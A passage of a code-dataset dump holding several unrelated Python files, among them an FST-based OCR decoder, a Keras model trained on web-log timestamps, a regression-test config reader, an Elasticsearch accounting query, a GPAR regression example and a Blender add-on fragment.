cores=4) # draw posterior samples using NUTS sampling\n# print(trace)\n\n pm.traceplot(trace, var_names = ['b0', 'b1', 'sigma'])\n plt.tight_layout();\n\n return pm.summary(trace, var_names = ['b0', 'b1', 'sigma'])\n\n\n\nresb0 = b0_bayesianmodel(y)\nresb0b1 = b0b1_bayesianmodel(y)\n \nprint(\"\")\n \n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n","sub_path":"stats/mle/tests/bayes_AR1.py","file_name":"bayes_AR1.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"219184722","text":"#!/usr/bin/env python\n# -*- coding:utf8 -*-\n\nfrom subprocess import Popen, PIPE\nimport os.path\n\nclass Decoder:\n\n def __init__(self, lm):\n self.lm = lm\n\n self.initial_state = 0\n self.final_state = 0\n self.state = 0\n self.output_filename = None\n self.output_file = None\n\n def __del__(self):\n if self.output_file:\n self.output_file.close()\n\n def set_output_filename(self, filename):\n if self.output_filename:\n 
self.output_file.close()\n self.output_filename = None\n self.output_filename = filename\n self.output_file = open(self.output_filename, 'w')\n\n def increment_state(self):\n self.state += 1\n return self\n\n def get_current_state(self):\n return self.state\n\n def write(self, data):\n if self.decoder_input:\n self.decoder_input(data)\n if self.output_file:\n self.output_file.write(data)\n\n def get_blank_symbol(self):\n # SolFST ならオーバーライドする\n return u''\n\n def set_initial(self, state=0):\n # 必要に応じてオーバーライドする\n self.initial_state = state\n return self\n\n def set_final(self, state=None):\n # 必要に応じてオーバーライドする\n if state:\n self.final_state = satae\n else:\n self.final_state = self.state\n return self\n\n def add_arc(self, insym, outsym, weight=None):\n # オーバーライドする\n return self\n\n def shortestpath(self):\n # オーバーライドする\n return u''\n\n\n\nclass DecoderSolFST(Decoder):\n\n def __init__(self, lm):\n Decoder.__init__(self, lm)\n self.decoder_command = Popen([os.path.join('.', 'bin', 'MySolfstDecoder'), self.lm], stdin=PIPE, stdout=PIPE)\n self.decoder_input = self.decoder_command.stdin.write\n\n def get_blank_symbol(self):\n return u'blank'\n\n def set_initial(self, state=0):\n Decoder.set_initial(self, state)\n self.write('#FSTBasic MinPlus\\n')\n self.write('I {}\\n'.format(self.initial_state))\n return self\n\n def set_final(self, state=None):\n Decoder.set_final(self, state)\n self.write('F {}\\n'.format(self.final_state))\n return self\n\n def add_arc(self, insym, outsym, weight=None):\n weight = weight if weight else ''\n data = \"T {} {} {} {} {}\\n\".format(self.state, self.state + 1, insym, outsym, weight)\n self.write(data)\n return self\n\n def shortestpath(self):\n self.decoder_command.stdin.close()\n return self.decoder_command.stdout.readline().decode('utf-8').strip()\n\n\n\n# import pywrapfst as pwfst\n\nclass DecoderOpenFST(Decoder):\n\n def __init__(self, lm):\n Decoder.__init__(self, lm)\n self.lm_obj = pwfst.Fst.read(self.lm)\n self.chars_syms = pwfst.SymbolTable.read_text(os.path.join(os.path.dirname(self.lm), \"chars.txt\"))\n self.words_syms = pwfst.SymbolTable.read_text(os.path.join(os.path.dirname(self.lm), \"words.txt\"))\n\n self.lm_obj.set_input_symbols( self.chars_syms )\n self.lm_obj.set_output_symbols( self.words_syms )\n\n def set_initial(self, state=0):\n self.compiler = None\n\n self.compiler = pwfst.Compiler(\n isymbols=self.chars_syms,\n osymbols=self.chars_syms,\n keep_isymbols=True,\n keep_osymbols=True\n )\n self.decoder_input = self.compiler.write\n return self\n\n def set_final(self, state=None):\n Decoder.set_final(self, state)\n self.write('{}\\n'.format(self.final_state))\n return self\n\n def add_arc(self, insym, outsym, weight=None):\n weight = weight if weight else ''\n data = \"{} {} {} {} {}\\n\".format(self.state, self.state + 1, insym, outsym, weight)\n self.write(data)\n return self\n\n def shortestpath(self):\n\n f = self.compiler.compile()\n f.arcsort()\n ret = pwfst.compose(f, self.lm_obj)\n\n ret.set_input_symbols( self.chars_syms )\n ret.set_output_symbols( self.words_syms )\n wfst = pwfst.shortestpath(ret).topsort()\n\n result = []\n for s in wfst.states():\n for a in wfst.arcs(s):\n if a.olabel > 0: # の id は常に 0\n result.append(wfst.output_symbols().find(a.olabel))\n return ''.join(result)\n\n\n\nif __name__ == '__main__':\n\n lm_file = 'morihirokazu.fst'\n\n d = None\n\n type = 'PyWrapFST'\n #type = 'SolFST'\n\n if type == 'SolFST':\n with open(lm_file, 'w') as lm:\n lm.write('I 0\\n')\n lm.write('T 0 1 \\n')\n lm.write('T 1 2 森 
森\\n')\n lm.write('T 2 3 博 博\\n')\n lm.write('T 3 4 一 一\\n')\n lm.write('T 4 5 \\n')\n lm.write('F 5\\n')\n\n d = DecoderSolFST(lm_file)\n elif type == 'PyWrapFST':\n with open('chars.txt', 'w') as c:\n c.write(' 1\\n')\n c.write('森 2\\n')\n c.write('博 3\\n')\n c.write('一 4\\n')\n c.write(' 5\\n')\n c.write('薪 6\\n')\n c.write('萩 7\\n')\n c.write('捜 8\\n')\n c.write('傅 9\\n')\n c.write('- 10\\n')\n c.write('ノ 11\\n')\n os.system('cp chars.txt words.txt')\n\n with open(lm_file, 'w') as lm:\n lm.write('0 1 \\n')\n lm.write('1 2 森 森\\n')\n lm.write('2 3 博 博\\n')\n lm.write('3 4 一 一\\n')\n lm.write('4 5 \\n')\n lm.write('5\\n')\n os.system('fstcompile --isymbols=chars.txt --osymbols=words.txt --keep_isymbols --keep_osymbols {} morihirokazu.bin'.format(lm_file))\n d = DecoderOpenFST('morihirokazu.bin')\n elif type == 'OpenFST':\n print('not yet')\n exit()\n else:\n print('not yet')\n exit()\n\n d.set_output_filename('test-input.fst')\n\n d.set_initial()\n d.add_arc('', '')\n d.increment_state()\n\n d.add_arc('森', '森', 0.05)\n d.add_arc('薪', '薪', 0.15)\n d.add_arc('萩', '萩', 0.18)\n d.increment_state()\n\n d.add_arc('捜', '捜', 0.3)\n d.add_arc('傅', '傅', 0.020)\n d.add_arc('博', '博', 0.024)\n d.increment_state()\n\n d.add_arc('一', '一', 0.18)\n d.add_arc('-', '-', 0.17)\n d.add_arc('ノ', 'ノ', 1.8)\n d.increment_state()\n\n d.add_arc('', '')\n d.increment_state()\n\n d.set_final()\n\n print(d.shortestpath())\n","sub_path":"freepitch改善/追加資材_0719/aiocr_dnn_optical_model/utils/Decoder.py","file_name":"Decoder.py","file_ext":"py","file_size_in_byte":6556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"229792142","text":"\"\"\"\nMulti-gate Mixture-of-Experts demo with census income data.\n\nCopyright (c) 2018 Drawbridge, Inc\nLicensed under the MIT License (see LICENSE for details)\nWritten by Peizhou Liao\n\"\"\"\n\nimport random\n\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\nfrom keras import backend as K\nfrom keras import metrics\nfrom keras.optimizers import Adam\nfrom keras.initializers import VarianceScaling\nfrom keras.layers import Input, Dense\nfrom keras.models import Model\nfrom keras.models import Sequential\nfrom keras.layers import BatchNormalization,Dense, Activation\n\nfrom mmoe import MMoE\n\nimport kerasplt as kp\n\nSEED = 1\n\n# Fix numpy seed for reproducibility\nnp.random.seed(SEED)\n\n# Fix random seed for reproducibility\nrandom.seed(SEED)\n\n# Fix TensorFlow graph-level seed for reproducibility\ntf.set_random_seed(SEED)\ntf_session = tf.Session(graph=tf.get_default_graph())\nK.set_session(tf_session)\n\nimport numpy as np\nfrom datetime import datetime\nimport re\nfrom collections import Counter\n\ndef apache_log_reader(logfile,regex,ts_format):\n data = []\n labels = []\n #labels.append([])\n #labels.append([])\n myregex = regex\n i = 0\n with open(logfile, encoding=\"utf8\", errors='ignore') as f:\n for log in f:\n ts = re.findall(myregex,log)[0]\n dt = datetime.strptime(ts,ts_format)\n #data.append([i,dt.timestamp(),dt.year,dt.month,dt.day,dt.hour,dt.minute,dt.second])\n data.append([float(dt.timestamp())])\n labels.append(i)\n #labels[1].append(i)\n i = i+1\n return data,labels\n\ndef data_preparation():\n #train_data,train_label = apache_log_reader(\"../sdsc-http.txt\",r'[SMTWF][a-z]{2} [JFMASOND][a-z]{2} \\d{2} \\d{2}:\\d{2}:\\d{2} \\d{4}',\"%a %b %d %H:%M:%S %Y\")\n train_data,train_label = 
apache_log_reader(\"../usask_access_log_50k\",r'\\d{2}/.../\\d{4}\\:\\d{2}\\:\\d{2}\\:\\d{2}',\"%d/%b/%Y:%H:%M:%S\")\n train_data=train_data-np.amin(train_data)\n cols = ['pk']\n train_data = pd.DataFrame.from_records(train_data, columns=cols)\n validation_data, validation_label = train_data,train_label\n test_data, test_label = train_data,train_label\n \n return train_data, train_label, validation_data, validation_label, test_data, test_label\ndef reshape(a):\n aa = []\n aa.append(a)\n return aa \n\ndef data_preparation_moe():\n train_data, train_l, validation_data, validation_l, test_data, test_l = data_preparation()\n\n \n return train_data, reshape(train_l), validation_data, reshape(validation_l), test_data, reshape(test_l)\n\ndef main1():\n # Load the data\n train_data, train_label, validation_data, validation_label, test_data, test_label = data_preparation_moe()\n num_features = train_data.shape[1]\n\n print('Training data shape = {}'.format(train_data.shape))\n print('Validation data shape = {}'.format(validation_data.shape))\n print('Test data shape = {}'.format(test_data.shape))\n \n #print('Training laebl shape = {}'.format(len(train_label)))\n \n \n \n # Set up the input layer\n input_layer = Input(shape=(num_features,))\n\n # Set up MMoE layer\n mmoe_layers = MMoE(\n units=16,\n num_experts=8,\n num_tasks=1\n )(input_layer)\n\n output_layers = []\n\n output_info = ['y0']\n\n print(\"mmoe_layers type is={}\".format(type(mmoe_layers)))\n# for index, task_layer in enumerate(mmoe_layers):\n# print(\"index is ={}\".format(index))\n# print(\"task_layer is ={}\".format(type(task_layer)))\n # Build tower layer from MMoE layer\n #for index, task_layer in enumerate(mmoe_layers):\n tower_layer = Dense(\n units=8,\n activation='relu',\n kernel_initializer=VarianceScaling())(mmoe_layers)\n output_layer = Dense(\n units=1,\n name=output_info[0],\n activation='linear',\n kernel_initializer=VarianceScaling())(tower_layer)\n output_layers.append(output_layer)\n\n # Compile model\n model = Model(inputs=[input_layer], outputs=output_layers)\n learning_rates = [1e-4]\n adam_optimizer = Adam(lr=learning_rates[0])\n model.compile(\n loss={'y0': 'mean_squared_error'},\n optimizer=adam_optimizer,\n metrics=[metrics.mae]\n )\n\n # Print out model architecture summary\n model.summary()\n\n # Train the model\n model.fit(\n x=train_data,\n y=train_label,\n validation_data=(validation_data, validation_label),\n epochs=100\n )\n return model\n\n\ndef main():\n # Load the data\n train_data, train_label, validation_data, validation_label, test_data, test_label = data_preparation()\n num_features = train_data.shape[1]\n\n print('Training222 data shape = {}'.format(train_data.shape))\n print('Validation data shape = {}'.format(validation_data.shape))\n print('Test data shape = {}'.format(test_data.shape))\n\n \n\n # Compile model\n model = Sequential()\n model.add(BatchNormalization(input_shape=(1,)))\n model.add(Dense(10,use_bias=True))\n model.add(Activation('relu'))\n model.add(Dense(1,use_bias=True))\n learning_rates = [1e-4, 1e-3, 1e-2]\n adam_optimizer = Adam(lr=learning_rates[0])\n model.compile(\n loss='mean_absolute_error',\n optimizer=adam_optimizer,\n metrics=[metrics.mae]\n )\n\n # Print out model architecture summary\n model.summary()\n\n # Train the model\n model.fit(\n x=train_data,\n y=train_label,\n validation_data=(validation_data, validation_label),\n epochs=100\n #,callbacks=[kp.plot_losses]\n )\n \n return model\n\n\nif __name__ == '__main__':\n 
main()\n","sub_path":"webtfkeras.py","file_name":"webtfkeras.py","file_ext":"py","file_size_in_byte":5613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"418559006","text":"# -------------------------------------------------------------------------\n# Name: regression_cfg.py\n# Purpose: read and parse sal_regression.cfg\n#\n# Author: bella_meng\n#\n# Created: 12/08/2015\n# -------------------------------------------------------------------------\nimport os\nimport ConfigParser\nfrom logging import debug as _d\nfrom re import compile\nfrom os.path import join\nfrom pdb import set_trace\n\nclass RegressionConfig(object):\n\n '''\n read sal regression configure file\n '''\n\n def __init__(self, config_file, client=None):\n '''\n init function\n '''\n _d('config_file is {0}'.format(config_file))\n self.config = ConfigParser.ConfigParser()\n self.config.read(config_file)\n self.work_dir = self.getWorkDir()\n self.client = client\n\n @property\n def final_cfg(self):\n return join(self.cfg.get('controller', 'client_dir'), 'final.cfg')\n\n @property\n def builds_dir(self):\n return self.cfg.get('controller', 'build_dir')\n\n @property\n def buildinfo_path(self):\n return join(self.builds_dir, 'buildinfo.json')\n\n @property\n def cfg(self):\n return self.config\n\n @property\n def client_work_dir(self):\n try:\n return self.cfg.get(self.client, 'work_dir')\n except ConfigParser.Error:\n return self.cfg.get('client', 'work_dir')\n\n @property\n def client_createlst_path(self):\n return join(self.client_work_dir, 'utils', 'createlst.py')\n\n @property\n def client_start_script(self):\n try:\n return self.cfg.get(self.client, 'test_script')\n except ConfigParser.Error:\n return self.cfg.get('client', 'test_script')\n\n @property\n def client_data_dir(self):\n try:\n return self.cfg.get(self.client, 'data_dir')\n except ConfigParser.Error:\n return self.cfg.get('client', 'data_dir')\n\n @property\n def client_src_dir(self):\n try:\n return self.cfg.get(self.client, 'src_dir')\n except ConfigParser.Error:\n return self.cfg.get('client', 'src_dir')\n\n def getWorkDir(self):\n '''\n get controller work_dir, it could be defined in environment variable\n CWD or the current working directory\n '''\n work_dir = os.environ.get('CWD', None)\n if work_dir is None:\n work_dir = os.getcwd()\n return work_dir\n\n def getLocalBuildDir(self):\n '''\n get controller local build dir\n '''\n local_build_dir = os.path.join(\n self.work_dir, self.config.get(\"controller\", \"local_build_dir\"))\n return local_build_dir\n\n def getLocalBuildDir_32(self):\n '''\n get controller local 32 build storage dir\n '''\n local_build_dir = os.path.join(\n self.work_dir, self.config.get(\"controller\", \"local_build_dir_32\"))\n return local_build_dir\n\n def getLocalBuildDir_64(self):\n '''\n get controller local 64 build storage dir\n '''\n local_build_dir = os.path.join(\n self.work_dir, self.config.get(\"controller\", \"local_build_dir_64\"))\n return local_build_dir\n\n def getLocalBuildOK_32(self):\n '''\n get controller unzipped local 32 build ok dir\n '''\n local_build_dir = os.path.join(\n self.work_dir, self.config.get(\"controller\", \"local_build_32_ok\"))\n return local_build_dir\n\n def getLocalBuildOK_64(self):\n '''\n get controller unzipped local 64 build ok dir\n '''\n local_build_dir = os.path.join(\n self.work_dir, self.config.get(\"controller\", \"local_build_64_ok\"))\n return local_build_dir\n\n def getLocalBuildInfo(self):\n '''\n get controller local 
build info\n '''\n local_build_info = {\n \"local_build_dir\": self.getLocalBuildDir(),\n \"local_build_dir_32\": self.getLocalBuildDir_32(),\n \"local_build_dir_64\": self.getLocalBuildDir_64(),\n \"local_build_32_ok\": self.getLocalBuildOK_32(),\n \"local_build_64_ok\": self.getLocalBuildOK_64()}\n return local_build_info\n\n def getLocalPatternDir(self):\n '''\n get controller local pattern dir\n '''\n local_pattern_dir = os.path.join(\n self.work_dir, self.config.get(\"controller\", \"local_pattern_dir\"))\n return local_pattern_dir\n\n def getLocalPatternOKDir(self):\n '''\n get controller local pattern unzipped dir\n '''\n local_pattern_dir = os.path.join(\n self.work_dir, self.config.get(\"controller\", \"local_pattern_ok\"))\n return local_pattern_dir\n\n def getLocalPatternInfo(self):\n '''\n get controller local pattern info\n '''\n local_pattern_info = {\"local_pattern_dir\": self.getLocalPatternDir(\n ), \"local_pattern_ok\": self.getLocalPatternOKDir()}\n return local_pattern_info\n\n def getResultDir(self):\n '''\n get controller result dir\n '''\n result_dir = os.path.join(\n self.work_dir, self.config.get(\"controller\", \"result_dir\"))\n return result_dir\n\n def getBuildInfo(self):\n '''\n get build info dict\n '''\n build_version = self.config.get(\"build\", \"build_version\") # deperated\n build_path = self.config.get(\"build\", \"build_path\")\n build_path_32 = os.path.join(build_path, build_version, \"win32\")\n build_path_64 = os.path.join(build_path, build_version, \"win64\")\n build_paths = [p[1] for p in self.config.items('build_paths')]\n build_filters = self.config.get('build', 'filters').split(',')\n version = self.config.get('build', 'version')\n build_suffix_path = self.config.get('build', 'build_suffix_path')\n\n return {\"build_path\": build_path,\n \"build_path_32\": build_path_32,\n \"build_path_64\": build_path_64,\n \"build_version\": build_version,\n \"build_paths\": build_paths,\n 'filters': build_filters,\n 'version': version,\n 'suffix_path': build_suffix_path}\n\n def getPatternInfo(self):\n '''\n get Pattern info dict\n '''\n pattern_path = self.config.get(\"pattern\", \"pattern_path\")\n pattern_name = self.config.get(\"pattern\", \"pattern_name\")\n pat = compile(r'\\d+(\\.\\d+)*')\n m = pat.search(pattern_name)\n pattern_version = m.group()\n return {\"pattern_path\": pattern_path,\n \"pattern_version\": pattern_version,\n \"pattern_name\": pattern_name}\n\n def getEmailFrom(self):\n '''\n get email from info\n '''\n email_from = self.config.get(\"email\", \"from\")\n return email_from\n\n def getEmailTo(self):\n '''\n get email to info\n '''\n emailto_str = self.config.get(\"email\", \"to\")\n emailto_list = emailto_str.strip(\",\").split(\",\")\n return emailto_list\n\n def getClientGroupInfo(self):\n '''\n get ClientGroup info\n '''\n clientgroup_str = self.config.get(\"controller\", \"client_group\")\n client_list = clientgroup_str.strip(\",\").split(\",\")\n return client_list\n\n def getVIXWorkDir(self):\n '''\n get vmware vix work dir\n '''\n vix_dir = self.config.get(\"controller\", \"vix_dir\")\n return vix_dir\n\n\n def getProductname(self):\n '''\n get test product name info\n '''\n productname = self.config.get(\n \"test_info\", \"productname\").lower().strip()\n return productname\n\n def getWorkClientGroupInfo(self):\n '''\n get Working ClientGroup info\n '''\n clientgroup_str = self.config.get(\"test_info\", \"work_client_group\")\n client_list = clientgroup_str.strip(\",\").split(\",\")\n return client_list\n\n def 
isRevertNeeded(self):\n '''\n if need revert vm\n '''\n r = self.config.get(\"test_info\", \"need_revert\")\n if r.strip()==\"0\":\n return False\n else:\n return True\n\n def getClientIp(self, client):\n '''\n get client ip\n '''\n IP = self.config.get(client, \"IP\")\n return IP\n\n def getEsxiServerInfo(self):\n '''\n get esxi server info\n '''\n h = self.config.get(\"esxi_server\", \"host\")\n u = self.config.get(\"esxi_server\", \"user\")\n p = self.config.get(\"esxi_server\", \"pwd\")\n srv_info = {\"host\": h, \"user\":u, \"pwd\":p}\n return srv_info\n\n def getClientVMInfo(self, client):\n '''\n get client vm path and snapshot\n '''\n try:\n p = self.config.get(client, \"vm_path\")\n s = self.config.get(client, \"vm_snapshot\")\n except:\n return None\n vm_info = {\"path\": p, \"snapshot\":s}\n return vm_info\n \n\n def getControllerIp(self, client):\n '''\n get controller ip\n '''\n IP = self.config.get(client, \"controller\")\n return IP\n\n def getClientInfoDict(self, client):\n '''\n get client info dict\n '''\n Type = self.config.get(client, \"type\")\n IP = self.config.get(client, \"IP\")\n work_dir = self.client_work_dir\n controller = self.config.get(client, \"controller\")\n # set_trace()\n build_dir = os.path.join(work_dir, self.config.get(\n client, \"build_dir\"))\n result_dir = os.path.join(work_dir, self.config.get(\n client, \"result_dir\"))\n src_dir = os.path.join(work_dir, self.client_src_dir)\n data_dir = os.path.join(work_dir, self.client_data_dir)\n return {\n \"type\": Type,\n \"IP\": IP,\n \"controller\": controller,\n \"work_dir\": work_dir,\n \"build_dir\": build_dir,\n \"result_dir\": result_dir,\n 'src_dir': src_dir,\n 'data_dir': data_dir\n }\n\n # deperated\n def getClientResult(self):\n '''\n get client result file list\n '''\n result_file_section = r\"result_file_\" + self.getProductname()\n result_file_str = self.config.get(\"test_info\", result_file_section)\n result_file_list = result_file_str.strip(\",\").split(\",\")\n return result_file_list\n\n def getUpdateCaseSrc(self):\n '''\n get update cases src path\n '''\n src = os.path.join(\n self.work_dir, self.config.get(\"update_case\", \"src\"))\n return src\n\n def getUpdateCaseDst(self, client):\n '''\n get update cases dst path\n '''\n dst = os.path.join(\n self.config.get(client, \"work_dir\"),\n self.config.get(\"update_case\", \"dst\"))\n return dst\n","sub_path":"src/utils/regression_cfg.py","file_name":"regression_cfg.py","file_ext":"py","file_size_in_byte":10835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"515627498","text":"import sys\n\nn = sys.stdin.readlines()\n\nwords = []\nfor i in n:\n\ti = i.rstrip('\\n')\n\twords.append(i)\n\ncc = {}\ns = []\nfor i in words:\n\ttotal = 0\n\tdetails = i.split(':')\n\tdetails[1] = details[1].strip()\n\tscore = details[1].split()\n\tfor k in score:\n\t\tif k.isdigit():\n\t\t\ttotal += int(k)\n\t\telse:\n\t\t\ttotal = 0\n\t\t\tbreak\n\t\n\tif total != 0:\n\t\tcc[total] = details[0]\n\t\ts.append(total)\ns = sorted(s)\nm = len(s) - 1\nwhile m >= 0:\n\tprint(cc[s[m]] + ':', s[m], 'points')\n\tm = m - 1\n","sub_path":"programming_2_ca117-master/programming_2_ca117-master/Lab Exam 1/league_61.py","file_name":"league_61.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"588582114","text":"\nimport os\n\nimport numpy as np\nimport pandas as pd\n\n\"\"\"\n\n\tScript for processing and saving 
UV-data.\n\n\thttp://strang.smhi.se/extraction/index.php\n\tCIE UV irradiance [mW/m^2]\n\tNote that the values are instantaneous and refer to the full hour (UTC). Swedish local time is UTC + 1 h during winter time and UTC + 2 h during the summer.\n\n\"\"\"\n\n\nLOCATION = 'LE'\nLABEL_NAME = 'uv_' + LOCATION\n\nINPUT_DATA_PATH = '../../data/SMHI/Add/uv_daily_Lilla_Edet.txt'\nOUTPUT_DATA_PATH = '../data/cleanedFiles/uv_' + LOCATION + '.csv'\n\nif __name__ == '__main__':\n\n\tdf = pd.read_csv(\n\t\tINPUT_DATA_PATH,\n\t\tsep=' ',\n\t\tskiprows=4,\n\t\tnames=['year', 'month', 'day', 'hour', LABEL_NAME]\n\t)\n\n\tdf['timestamp'] = pd.to_datetime(df[['year', 'month', 'day']])\n\n\tdf = df.drop(\n\t\t[\n\t\t\t'year',\n\t\t\t'month',\n\t\t\t'day',\n\t\t\t'hour'\n\t\t],\n\t\taxis=1\n\t)\n\n\t# Remove -999\n\tdf = df[df[LABEL_NAME] >= 0.0]\n\n\tdf[['timestamp', LABEL_NAME]].to_csv(\n\t\tOUTPUT_DATA_PATH,\n\t\tindex=False\n\t)","sub_path":"waterqualit_pred/waquapred-master/deprecated/preprocessing/process_uv.py","file_name":"process_uv.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"457011429","text":"#!/usr/bin/python\n\nimport elasticsearch\nfrom elasticsearch_dsl import Search, A, Q\n#import logging\nimport operator\nimport sys\nimport os\nimport dateutil.parser as parser\n\n#logging.basicConfig(level=logging.WARN)\n#es = elasticsearch.Elasticsearch(\n# ['https://gracc.opensciencegrid.org/q'],\n# timeout=300, use_ssl=True, verify_certs=False)\nes = elasticsearch.Elasticsearch()\n\nosg_raw_index = 'gracc.osg.raw-*'\nosg_summary_index = 'gracc.osg.summary'\n\nstarttime = parser.parse(\"2021-02-12\")\nendtime = parser.parse(\"2021-03-17\")\n\ns = Search(using=es, index=osg_raw_index)\n\ns = s.query(\"match\", Grid=\"Local\")\ns = s.query(\"match\", ProbeName=\"slurm:hammer-osg.rcac.purdue.edu\")\ns = s.query(Q(\"range\", EndTime={\"gte\": starttime, \"lt\": endtime}))\ns = s.query(~Q(\"exists\", field=\"VOName\"))\nresponse = s.execute()\n\nprint(\"Query took %i milliseconds\" % response.took)\n\nprint(\"Query got %i hits\" % response.hits.total.value)\n#s.delete()\n\n\ns = Search(using=es, index=osg_summary_index)\ns = s.query(\"match\", Grid=\"Local\")\ns = s.query(\"match\", ProbeName=\"slurm:hammer-osg.rcac.purdue.edu\")\ns = s.query(Q(\"range\", EndTime={\"gte\": starttime, \"lt\": endtime}))\ns = s.query(\"match\", VOName=\"N/A\")\n\nresponse = s.execute()\nprint(\"Query took %i milliseconds\" % response.took)\n\nprint(\"Query got %i hits\" % response.hits.total.value)\n#s.delete()\n\n","sub_path":"gracc-oneoffs/remove-purdue-local/remote-purdue-local.py","file_name":"remote-purdue-local.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"107828806","text":"import argparse\nimport os\nimport torch\nimport torch.nn.functional as F\nimport torchvision\n\nfrom network import Generator\n\n\nPARSER = argparse.ArgumentParser()\nPARSER.add_argument('--model_file_name',\n default='generator.pth',\n help='The file name of a trained model')\nPARSER.add_argument('--grid_size',\n default='64', type=int,\n help='Grid size -> [1, 64]')\nPARSER.add_argument('--lsv_size',\n default='512', type=int,\n help='Size of latent space vectors')\nargs = PARSER.parse_args()\n\nGRID_SIZE = min(64, max(1, args.grid_size))\nMODEL_PATH = f'trained_models/{args.model_file_name}'\nDEVICE = torch.device('cuda' if 
torch.cuda.is_available() else 'cpu')\nSAVE_IMAGE_DIR = f'generated_with_preloaded_models'\n\nif args.grid_size > 1:\n # Save grids to separate directory.\n SAVE_IMAGE_DIR += '/grids'\nelse:\n # Add single images to a dedicated directory to use for evaluation.\n SAVE_IMAGE_DIR += '/1x1'\n\n\nif not os.path.exists(SAVE_IMAGE_DIR):\n os.makedirs(SAVE_IMAGE_DIR)\nIMAGE_NUM_SO_FAR = len(os.listdir(SAVE_IMAGE_DIR))\n\ngenerator_model = Generator().to(DEVICE)\n\ngenerator_model.load_state_dict(torch.load(MODEL_PATH, map_location=DEVICE))\ngenerator_model.eval()\nprint(f'Loaded model \"{MODEL_PATH}\"')\n\n# Create a random batch of latent space vectors.\nfixed_latent_space_vectors = torch.randn([GRID_SIZE, args.lsv_size], device=DEVICE)\n\ngenerated_images = generator_model(fixed_latent_space_vectors).detach()\ngenerated_images = F.interpolate(generated_images, size=(128, 128), mode='nearest')\ntorchvision.utils.save_image(generated_images, f'{SAVE_IMAGE_DIR}/{(IMAGE_NUM_SO_FAR+1):03d}.jpg', padding=2, normalize=True)\nprint(f'Saved image \"{SAVE_IMAGE_DIR}/{(IMAGE_NUM_SO_FAR+1):03d}.jpg\"')\n","sub_path":"generate_images.py","file_name":"generate_images.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"296923060","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom gpar.regression import GPARRegressor\n\nx = np.linspace(0, 1, 100)\nmodel = GPARRegressor(scale=0.1,\n linear=False, nonlinear=True, nonlinear_scale=0.5,\n impute=True, replace=True,\n noise=0.1, normalise_y=True)\n\n# Sample observations and discard some.\ny = model.sample(x, p=3)\ny_obs = y.copy()\ny_obs[np.random.permutation(100)[:25], 0] = np.nan\ny_obs[np.random.permutation(100)[:50], 1] = np.nan\ny_obs[np.random.permutation(100)[:75], 2] = np.nan\n\n# Fit model and predict.\nmodel.fit(x, y)\nmeans, lowers, uppers = \\\n model.predict(x, num_samples=200, latent=False, credible_bounds=True)\n\n# Plot the result.\nplt.figure(figsize=(8, 6))\nplt.rcParams['font.family'] = 'serif'\nplt.rcParams['mathtext.fontset'] = 'dejavuserif'\n\nfor i in range(3):\n ax = plt.subplot(3, 1, i + 1)\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n ax.yaxis.set_ticks_position('left')\n ax.xaxis.set_ticks_position('bottom')\n plt.ylabel('Output {}'.format(i + 1))\n plt.scatter(x, y[:, i], label='Truth', c='tab:orange')\n plt.scatter(x, y_obs[:, i], label='Observations', c='black')\n plt.plot(x, means[:, i], label='Prediction', c='tab:blue')\n plt.plot(x, lowers[:, i], c='tab:blue', ls='--')\n plt.plot(x, uppers[:, i], c='tab:blue', ls='--')\n if i == 2:\n leg = plt.legend(facecolor='#eeeeee')\n leg.get_frame().set_linewidth(0)\n\nplt.tight_layout()\nplt.savefig('examples/model_sample_prediction.pdf')\nplt.show()\n","sub_path":"examples/model_sample.py","file_name":"model_sample.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"118460868","text":"'''\nCreated on Jun 12, 2013\n\n@author: Christoph Paulik christoph.paulik@geo.tuwien.ac.at\n'''\n\nfrom validation_tool.iout.db_model import interface\n\n\ndef plot_ascat_data(station_id):\n\n from matplotlib import pyplot as plt\n\n vt_db = interface()\n vt_db.connect()\n\n fig = plt.figure()\n ax = fig.add_axes()\n data = vt_db.get_ascat_data_for_station_id(station_id)\n data['sm'].plot(ax=ax)\n return fig\n\n\ndef plot_era_interim_data(station_id):\n\n from matplotlib 
import pyplot as plt\n\n vt_db = interface()\n vt_db.connect()\n\n data = vt_db.get_era_interim_data_for_station_id(station_id)\n data.plot(subplots=True)\n plt.show()\n","sub_path":"validation_tool/server/plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"30416107","text":"import bpy, math\r\nfrom mathutils import Vector\r\nfrom bpy.props import IntProperty, FloatProperty\r\nfrom . import infobar\r\nfrom ... preferences import get_preferences\r\nfrom ... ui_framework.master import Master\r\nfrom ... ui_framework.utils.mods_list import get_mods_list\r\nfrom ... utility.base_modal_controls import Base_Modal_Controls\r\n\r\n# Cursor Warp imports\r\nfrom ... utils.toggle_view3d_panels import collapse_3D_view_panels\r\nfrom ... utils.modal_frame_drawing import draw_modal_frame\r\nfrom ... utils.cursor_warp import mouse_warp\r\nfrom ... addon.utility import method_handler\r\n\r\n\r\nclass HOPS_OT_AdjustCurveOperator(bpy.types.Operator):\r\n bl_idname = \"hops.adjust_curve\"\r\n bl_label = \"Adjust Curve\"\r\n bl_description = \"Interactive Curve adjustment. 1/2/3 provides presets for curves\"\r\n 